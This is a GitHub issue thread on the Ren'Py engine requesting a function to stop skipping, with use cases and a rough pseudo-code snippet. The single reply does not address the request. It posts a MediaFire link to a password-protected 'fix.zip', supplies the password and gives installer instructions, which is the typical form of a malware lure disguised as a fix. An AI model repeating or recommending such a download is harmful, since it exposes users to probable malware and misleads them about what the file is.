### ISSUE TITLE
Stop skipping function addition

### ISSUE THREAD

**Issue by raspberry-soft** [renpy/renpy#5743]
Use cases:
- As a dev, to insert checkpoints to fast skip to.
- When an important end-of-game screen, prompt or call-to-action is shown to avoid players to skip it.

```renpy
    def renpy.stop_skipping():

        if renpy.config.skipping:
            renpy.config.skipping = None
```

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
